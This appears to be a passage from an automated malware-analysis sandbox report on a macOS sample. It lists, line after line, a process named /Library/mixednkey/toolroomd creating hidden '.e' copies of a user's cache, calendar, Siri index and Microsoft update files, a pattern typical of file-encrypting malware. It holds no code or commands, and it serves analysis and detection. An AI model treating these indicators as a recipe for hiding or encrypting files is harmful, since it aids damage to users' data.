Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.B6BA766A-92E4-4ACE-BC29-0C0414D8305D.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.BB5BA468-61A9-4207-8252-90A6BC2508AD.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.BD0EAB23-7D88-4A89-9262-2D9B97D7F120.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.C14F10BD-86B3-4560-B073-6A6BCA7F794F.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.C2914824-1F93-4498-8975-09B8A8CBC60B.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.D1668549-E894-45CE-98CB-C51B32169230.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.D38E7BCF-CD66-4D26-94F7-67EF840B2C22.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.D3EAC4D0-8494-4F6F-88AE-4196CB408F7D.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.D4BCC0DE-6C0E-4D26-AB80-76C532CE6CF7.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.D4D5E426-8501-4C38-8ED4-CB3D10B4405E.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.E252C87F-8839-46CD-9DB6-37D6704B2AF0.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.E351B077-0A32-46E6-9DD0-6B57346F7779.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.E3F027A4-D826-414D-B174-946B6B3A17EF.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.EB21A37F-4B57-49E7-AF7F-9BE61235F8C7.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.EDDD99F3-FF68-44BC-95F1-4FC7DA8ED405.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.F6BB0A9E-07B2-4DF7-BBBA-0182A2DD7079.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/GeoServices/Resources/.altitude-827.xml.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/GeoServices/Resources/.cemetery-15.png.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/GeoServices/Resources/.cemetery-15@2x.png.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/GeoServices/Resources/.clut-night-2.png.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/GeoServices/Resources/.concrete-17.png.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/GeoServices/Resources/.concrete-17@2x.png.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/GeoServices/Resources/.DetailedLandCoverPavedArea-1.png.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/GeoServices/Resources/.DetailedLandCoverPavedArea-1@2x.png.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/GeoServices/Resources/.golf_course-15.png.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/GeoServices/Resources/.golf_course-15@2x.png.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/GeoServices/Resources/.land-18.png.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/GeoServices/Resources/.land-19@2x.png.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/GeoServices/Resources/.land-carplay-1.png.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/GeoServices/Resources/.land-carplay-1@2x.png.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/GeoServices/Resources/.LandCoverGradient1-1.png.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/GeoServices/Resources/.LandCoverGradient1-1@2x.png.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/GeoServices/Resources/.LandCoverGradient16-1.png.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/GeoServices/Resources/.LandCoverGradient16-1@2x.png.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/GeoServices/Resources/.LandCoverGradient8-1.png.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/GeoServices/Resources/.LandCoverGradient8-1@2x.png.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/GeoServices/Resources/.LandCoverGradient9-1.png.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/GeoServices/Resources/.LandCoverGradient9-1@2x.png.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/GeoServices/Resources/.night-cemetery-2.png.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/GeoServices/Resources/.night-cemetery-2@2x.png.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/GeoServices/Resources/.night-concrete-1.png.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/GeoServices/Resources/.night-concrete-1@2x.png.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/GeoServices/Resources/.night-DetailedLandCoverPavedArea-2.png.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/GeoServices/Resources/.night-DetailedLandCoverPavedArea-2@2x.png.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/GeoServices/Resources/.night-DetailedLandCoverSand-1.png.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/GeoServices/Resources/.night-DetailedLandCoverSand-1@2x.png.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/GeoServices/Resources/.night-golf_course-2.png.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/GeoServices/Resources/.night-golf_course-2@2x.png.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/GeoServices/Resources/.night-land-2.png.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/GeoServices/Resources/.night-land-2@2x.png.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/GeoServices/Resources/.night-land-carplay-1.png.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/GeoServices/Resources/.night-land-carplay-1@2x.png.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/GeoServices/Resources/.night-park-2.png.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/GeoServices/Resources/.night-park-2@2x.png.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/GeoServices/Resources/.night-RealisticRoadHighway-1.png.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/GeoServices/Resources/.night-RealisticRoadHighway-1@2x.png.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/GeoServices/Resources/.night-RealisticRoadLocalRoad-1.png.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/GeoServices/Resources/.night-RealisticRoadLocalRoad-1@2x.png.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/GeoServices/Resources/.night-water-2.png.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/GeoServices/Resources/.night-water-2@2x.png.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/GeoServices/Resources/.no_data-2.png.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/GeoServices/Resources/.no_data-2@2x.png.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/GeoServices/Resources/.park-16.png.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/GeoServices/Resources/.park-16@2x.png.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/GeoServices/Resources/.RealisticRoadHighway-1.png.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/GeoServices/Resources/.RealisticRoadHighway-1@2x.png.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/GeoServices/Resources/.RealisticRoadLocalRoad-1.png.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/GeoServices/Resources/.RealisticRoadLocalRoad-1@2x.png.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/GeoServices/Resources/.road-noise-1@2x.png.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/GeoServices/Resources/.road-noise-2.png.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/GeoServices/Resources/.road-noise-light-1.png.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/GeoServices/Resources/.road-noise-light-1@2x.png.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/GeoServices/Resources/.sand-1.png.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/GeoServices/Resources/.sand-1@2x.png.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/GeoServices/Resources/.SFDisplayShields-CompressedBold-1.otf.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/GeoServices/Resources/.SFShieldsCondensed-Bold-1.otf.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/GeoServices/Resources/.SFShieldsSemicondensed-Bold-1.otf.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/GeoServices/Resources/.tomtom-mask-2.png.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/GeoServices/Resources/.tomtom-mask-3@2x.png.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/GeoServices/Resources/.transparent-1.png.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/GeoServices/Resources/.transparent-1@2x.png.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/GeoServices/Resources/.venues-ceiling-1@2x.png.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/GeoServices/Resources/.venues-ceiling-2.png.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/GeoServices/Resources/.water-16.png.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/GeoServices/Resources/.water-16@2x.png.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/GeoServices/Resources/.white-1.png.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/GeoServices/Resources/.white-1@2x.png.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Calendars/55551039-1526-493E-94BA-D7174A081E6E.calendar/LocalDefaultAlarms/.EventAllDayAlarms.icsalarm.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Calendars/55551039-1526-493E-94BA-D7174A081E6E.calendar/LocalDefaultAlarms/.EventTimedAlarms.icsalarm.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Calendars/55B84E7C-0E66-4F49-A679-F7EF35486EBA.calendar/LocalDefaultAlarms/.EventAllDayAlarms.icsalarm.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Calendars/55B84E7C-0E66-4F49-A679-F7EF35486EBA.calendar/LocalDefaultAlarms/.EventTimedAlarms.icsalarm.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Calendars/830E24F7-620D-4662-93D1-BCCC155BA6F2.calendar/LocalDefaultAlarms/.EventAllDayAlarms.icsalarm.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Calendars/830E24F7-620D-4662-93D1-BCCC155BA6F2.calendar/LocalDefaultAlarms/.EventTimedAlarms.icsalarm.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Calendars/885D75D5-6C5B-4D32-A412-444F6D271C8A.calendar/LocalDefaultAlarms/.EventAllDayAlarms.icsalarm.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Calendars/885D75D5-6C5B-4D32-A412-444F6D271C8A.calendar/LocalDefaultAlarms/.EventTimedAlarms.icsalarm.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Calendars/A8CC2242-71EE-493F-8F44-613D5BE39E92.calendar/LocalDefaultAlarms/.EventAllDayAlarms.icsalarm.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Calendars/A8CC2242-71EE-493F-8F44-613D5BE39E92.calendar/LocalDefaultAlarms/.EventTimedAlarms.icsalarm.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Calendars/F2222F47-AFA4-432D-95E1-D04C03536848.calendar/LocalDefaultAlarms/.EventAllDayAlarms.icsalarm.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Calendars/F2222F47-AFA4-432D-95E1-D04C03536848.calendar/LocalDefaultAlarms/.EventTimedAlarms.icsalarm.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.apple.siri.media-indexer/Data/.albumartistnamesdataTable.tdb.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.apple.siri.media-indexer/Data/.albumartistnamesedgeTable.tdb.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.apple.siri.media-indexer/Data/.albumartistnamesfinalTable.tdb.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.apple.siri.media-indexer/Data/.albumtitlesdataTable.tdb.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.apple.siri.media-indexer/Data/.albumtitlesedgeTable.tdb.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.apple.siri.media-indexer/Data/.albumtitlesfinalTable.tdb.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.apple.siri.media-indexer/Data/.artistnamesdataTable.tdb.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.apple.siri.media-indexer/Data/.artistnamesedgeTable.tdb.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.apple.siri.media-indexer/Data/.artistnamesfinalTable.tdb.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.apple.siri.media-indexer/Data/.composernamesdataTable.tdb.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.apple.siri.media-indexer/Data/.composernamesedgeTable.tdb.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.apple.siri.media-indexer/Data/.composernamesfinalTable.tdb.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.apple.siri.media-indexer/Data/.genrenamesdataTable.tdb.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.apple.siri.media-indexer/Data/.genrenamesedgeTable.tdb.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.apple.siri.media-indexer/Data/.genrenamesfinalTable.tdb.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.apple.siri.media-indexer/Data/.mediatitlesdataTable.tdb.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.apple.siri.media-indexer/Data/.mediatitlesedgeTable.tdb.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.apple.siri.media-indexer/Data/.mediatitlesfinalTable.tdb.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.apple.siri.media-indexer/Data/.playlistnamesdataTable.tdb.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.apple.siri.media-indexer/Data/.playlistnamesedgeTable.tdb.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.apple.siri.media-indexer/Data/.playlistnamesfinalTable.tdb.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.apple.siri.media-indexer/Data/.podcasttitlenamesdataTable.tdb.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.apple.siri.media-indexer/Data/.podcasttitlenamesedgeTable.tdb.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.apple.siri.media-indexer/Data/.podcasttitlenamesfinalTable.tdb.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Group Containers/UBF8T346G9.ms/com.microsoft.autoupdate.fba/.ceippref.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Application Support/com.apple.spotlight/CandidateReports/com.apple.Spotlight/.com.apple.Spotlight-2020-11-26.json.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Application Support/com.apple.spotlight/CandidateReports/com.apple.Spotlight/.com.apple.Spotlight-2020-11-30.json.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Application Support/com.microsoft.OneDriveStandaloneUpdater/com.microsoft.HockeyApp/MetaData/.metadata.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/Generated/com.apple.ActivityMonitor.help*10.13/.en_US.helpindex.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/Generated/com.apple.AddressBook.help*11.0/.en_US.helpindex.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/Generated/com.apple.airport.airportutility.help*6.3.8/.en_US.helpindex.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/Generated/com.apple.AppStore.help*2.3/.en_US.helpindex.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/Generated/com.apple.AudioMIDISetup.help*3.2/.en_US.helpindex.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/Generated/com.apple.Automator.help*2.8/.en_US.helpindex.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/Generated/com.apple.Calculator.help*10.13/.en_US.helpindex.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/Generated/com.apple.Chess.help*3.15/.en_US.helpindex.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/Generated/com.apple.Console.help*1.0/.en_US.helpindex.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/Generated/com.apple.Dictionary.help*2.2.2/.en_US.helpindex.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/Generated/com.apple.DiskUtility.help*17.0/.en_US.helpindex.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/Generated/com.apple.DVDPlayer.help*5.8/.en_US.helpindex.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/Generated/com.apple.FontBook.help*8.0/.en_US.helpindex.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/Generated/com.apple.Grapher.help*2.6/.en_US.helpindex.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/Generated/com.apple.iCal.help*10.0/.en_US.helpindex.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/Generated/com.apple.iChat.help*11.0/.en_US.helpindex.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/Generated/com.apple.ImageCapture.help*7.0/.en_US.helpindex.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/Generated/com.apple.iTunes.help*12.8.2/.en.helpindex.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/Generated/com.apple.machelp*10.13.2/.en_US.exactmatch.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/Generated/com.apple.machelp*10.13.2/.en_US.helpindex.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/Generated/com.apple.Mail.help*11.2/.en_US.helpindex.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/Generated/com.apple.Maps.help*2.0/.en_US.helpindex.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/Generated/com.apple.Notes.help*4.5/.en_US.helpindex.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/Generated/com.apple.PhotoBooth.help*9.0/.en_US.helpindex.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/Generated/com.apple.Preview.help*10.0/.en_US.helpindex.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/Generated/com.apple.QuickTimePlayerX.help*10.4/.en_US.helpindex.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/Generated/com.apple.reminders.help*5.0/.en_US.helpindex.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/Generated/com.apple.Safari.help*11.0.2/.en_US.helpindex.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/Generated/com.apple.ScriptEditor.help*2.10/.en_US.helpindex.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/Generated/com.apple.Stickies.help*10.1/.en_US.helpindex.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/Generated/com.apple.Terminal.help*2.8/.en_US.helpindex.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/Generated/com.apple.TextEdit.help*1.13/.en_US.helpindex.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/Microsoft/uls/com.microsoft.autoupdate.fba/.ci.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/.fileAttributes.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/.fileAttributes-shm.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/.fileAttributes-wal.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/.suggestions.plist.e	Jump to behavior
